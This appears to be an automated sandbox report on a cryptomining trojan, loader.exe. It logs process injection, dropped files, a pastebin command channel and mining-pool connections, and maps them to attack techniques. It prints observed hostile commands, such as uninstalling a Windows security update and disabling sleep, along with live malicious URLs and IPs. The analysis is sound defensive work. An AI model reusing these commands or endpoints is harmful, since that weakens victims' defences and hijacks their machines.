        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166910000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8740000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 265CF960000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 223DA540000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22638E00000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC097C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1CFE9AB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 250FB0F0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23523E30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B5CB5E0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E53D990000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAF9E60000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DD840000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DDE20000Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
        Source: C:\Windows\System32\dialer.exe Code function: 11_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,11_2_0000000140001B54
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC6236F0 cpuid 20_2_00000225DC6236F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,11_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC647960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_00000225DC647960
        Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
ATT&CK matrix by tactic (numbers in parentheses are the counts shown in the matrix next to the matched technique):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain
Execution: Windows Management Instrumentation (11), Native API (2), Service Execution (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
Persistence: DLL Side-Loading (1), Windows Service (11), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (11), Process Injection (713), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Defense Evasion: Disable or Modify Tools (1), Obfuscated Files or Information (1), Install Root Certificate (1), DLL Side-Loading (1), File Deletion (1), Rootkit (4), Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (131), Access Token Manipulation (1), Process Injection (713), Hidden Files and Directories (1)
Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging
Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (24), Security Software Discovery (33), Process Discovery (2), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), System Owner/User Discovery, Network Sniffing, Network Service Discovery, System Network Connections Discovery, Process Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content
Collection: Archive Collected Data (1), Credential API Hooking (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture
Command and Control: Web Service (1), Ingress Tool Transfer (1), Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (3), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking
Behavior Graph ID: 1537414, Sample: loader.exe, Start date: 18/10/2024, Architecture: WINDOWS, Score: 100

Network endpoints:
• pastebin.com (104.20.4.235, port 443, local port 49735, CLOUDFLARENETUS, United States): Connects to a pastebin service (likely for C&C)
• pool.hashvault.pro (142.202.242.43, port 443, local ports 49734 and 49736, 1GSERVERSUS, Reserved)

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures

Process tree:
• loader.exe (started)
  dropped: C:\ProgramData\...\wepulfrfkvoz.exe, PE32+
  signatures: Uses powercfg.exe to modify the power settings; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender
  • dialer.exe (started)
    signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to compare user and computer (likely to detect sandboxes)
    • lsass.exe (injected): Installs new ROOT certificates; Writes to foreign memory regions
    • dwm.exe (injected)
    • 2 other processes
  • powershell.exe (started): Loading BitLocker PowerShell Module
    • conhost.exe (started)
  • cmd.exe (started)
    • 2 other processes
  • 8 other processes
    • 8 other processes
• wepulfrfkvoz.exe (started)
  dropped: C:\Windows\Temp\gyqerfjfsbie.sys, PE32+
  signatures: Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver; Modifies power options to not sleep / hibernate
  • dialer.exe (started): Injects code into the Windows Explorer (explorer.exe); Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
    • 13 other processes
  • dialer.exe (started): Query firmware table information (likely to detect VMs); connects to pastebin.com (104.20.4.235:443) and pool.hashvault.pro (142.202.242.43:443)
  • powershell.exe (started)
    • conhost.exe (started)
  • 6 other processes
    • 6 other processes

Source | Detection | Scanner | Label
loader.exe | 63% | ReversingLabs | Win64.Trojan.Generic

Source | Detection | Scanner | Label
C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | 63% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\gyqerfjfsbie.sys | 5% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool.hashvault.pro | 142.202.242.43 | true | false | | unknown
pastebin.com | 104.20.4.235 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/f2EfCEn0 | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
142.202.242.43 | pool.hashvault.pro | Reserved | 14315 | 1GSERVERSUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1537414
Start date and time: 2024-10-18 23:08:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 17
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: loader.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.mine.winEXE@62/74@2/2
EGA Information:
• Successful, ratio: 90.5%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 40.126.31.69, 20.190.159.0, 40.126.31.71, 20.190.159.64, 20.190.159.73, 20.190.159.75, 40.126.31.67, 20.190.159.71
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target loader.exe, PID 3228 because it is empty
• Execution Graph export aborted for target wepulfrfkvoz.exe, PID 7348 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: loader.exe
Time | Type | Description
17:09:06 | API Interceptor | 1x Sleep call for process: loader.exe modified
17:09:10 | API Interceptor | 40x Sleep call for process: powershell.exe modified
17:09:47 | API Interceptor | 458138x Sleep call for process: winlogon.exe modified
17:09:48 | API Interceptor | 371220x Sleep call for process: lsass.exe modified
17:09:50 | API Interceptor | 3109x Sleep call for process: svchost.exe modified
17:09:52 | API Interceptor | 432423x Sleep call for process: dwm.exe modified
17:10:01 | API Interceptor | 1617x Sleep call for process: dialer.exe modified
Context: other analyses sharing an indicator with this sample. Each entry gives the associated sample name or URL, its threat name, and (where present) the context value; every listed match was detected as malicious.

Match: 104.20.4.235
• gabe.ps1 (Unknown), context: pastebin.com/raw/sA04Mwk2
• cr_asm_crypter.ps1 (Unknown), context: pastebin.com/raw/sA04Mwk2
• vF20HtY4a4.exe (Unknown), context: pastebin.com/raw/sA04Mwk2
• OSLdZanXNc.exe (Unknown), context: pastebin.com/raw/sA04Mwk2
• gaber.ps1 (Unknown), context: pastebin.com/raw/sA04Mwk2
• cr_asm_crypter.ps1 (Unknown), context: pastebin.com/raw/sA04Mwk2
• sostener.vbs (Njrat), context: pastebin.com/raw/V9y5Q5vv
• sostener.vbs (XWorm), context: pastebin.com/raw/V9y5Q5vv
• envifa.vbs (Remcos), context: pastebin.com/raw/V9y5Q5vv
• New Voicemail Invoice 64746w .js (WSHRAT), context: pastebin.com/raw/NsQ5qTHr

Match: 142.202.242.43
• PT54FFSL7ET46RASB.exe (LummaC Stealer, PureLog Stealer, Xmrig, zgRAT)
• System.exe (Flesh Stealer, Xmrig)
• 08OyZEWGbf.exe (Xmrig)
• zTMEFv0Dh3.exe (Xmrig)
• file.exe (Xmrig)
• http://5.42.66.10/download/123p.exe (Xmrig)
• SecuriteInfo.com.Trojan.Siggen27.52043.15111.6134.exe (Xmrig)
• VTbtz4ZUY6.exe (Xmrig)
• SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe (Xmrig)
• gQZvXi6Osc.exe (PureLog Stealer, Xmrig, zgRAT)

Match: pool.hashvault.pro
• 7K5DrSyL8Y.exe (Xmrig), context: 45.76.89.70
• eshkere.bat (Xmrig), context: 95.179.241.203
• frik.exe (Xmrig), context: 95.179.241.203
• Google Chrome.exe (Xmrig), context: 45.76.89.70
• e7WMhx18XN.exe (SilentXMRMiner, Xmrig), context: 45.76.89.70
• GcqJPBLD2Q.exe (BitCoin Miner, SilentXMRMiner, UACMe, Xmrig), context: 45.76.89.70
• C5Lg2JSPlD.exe (SilentXMRMiner, Xmrig), context: 95.179.241.203
• file.exe (RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig), context: 45.76.89.70
• file.exe (Xmrig), context: 45.76.89.70
• PT54FFSL7ET46RASB.exe (LummaC Stealer, PureLog Stealer, Xmrig, zgRAT), context: 142.202.242.43

Match: pastebin.com
• SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe (Xmrig), context: 172.67.19.24
• 6TCmDl2rFY.exe (DCRat), context: 104.20.4.235
• AF1cyL4cv6.vbs (AsyncRAT), context: 104.20.4.235
• FRi4mYXiwD.ps1 (AsyncRAT), context: 104.20.3.235
• FmpQycTC2G.ps1 (AsyncRAT), context: 104.20.4.235
• 4d5ZJqq0M7.vbs (AsyncRAT), context: 104.20.4.235
• PUvfQnmcl4.ps1 (AsyncRAT), context: 172.67.19.24
• sys_upd.ps1 (Unknown), context: 172.67.19.24
• cr_asm3.ps1 (Unknown), context: 104.20.3.235
• cr_asm_menu..ps1 (Unknown), context: 172.67.19.24

Match: CLOUDFLARENETUS
• https://click.pstmrk.it/3s/app.markup.io%2Finvite%2Faccept%2FGAelUtD0/OI9N/z2q4AQ/AQ/914fb818-2548-4566-aa09-a2d85ddc613b/2/KJFV2S8Gzw (Unknown), context: 104.16.117.116
• ZP4KZDHVHWZZ2DC13DMX.exe (Amadey), context: 104.21.52.75
• Remittance Advice Ck 34991.html (HTMLPhisher), context: 188.114.97.3
• setup.exe (LummaC), context: 188.114.96.3
• file.exe (LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc), context: 172.67.206.204
• z7N__MERODEORDENDECOMPRANO8478PDF.exe (FormBook), context: 104.21.48.76
• https://na4.docusign.net/Signing/EmailStart.aspx?a=943f47c1-68f1-4387-ae39-91f2830b86a0&etti=24&acct=e7f3e748-8206-4510-8315-0e64f8c91c9b&er=99aeb7e9-c08a-4462-99dc-389e7b080ab6 (Phisher), context: 104.17.25.14
• SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe (Xmrig), context: 172.67.19.24
• http://www.bollywoodhungama.com (Unknown), context: 104.26.8.169
• SecuriteInfo.com.Win64.DropperX-gen.15221.5174.exe (Unknown), context: 188.114.96.3

Match: 1GSERVERSUS
• sora.arm.elf (Mirai), context: 207.32.216.26
• PT54FFSL7ET46RASB.exe (LummaC Stealer, PureLog Stealer, Xmrig, zgRAT), context: 142.202.242.43
• System.exe (Flesh Stealer, Xmrig), context: 142.202.242.43
• 2BuZaUic3i.exe (RedLine), context: 207.32.219.79
• EpCrfIUgyF.exe (RedLine), context: 207.32.219.79
• 04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe (RedLine, Xmrig), context: 142.202.242.45
• Facturation.exe (Doenerium), context: 104.251.123.67
• SpelQ3Xvt7.exe (AveMaria, UACMe), context: 142.202.242.177
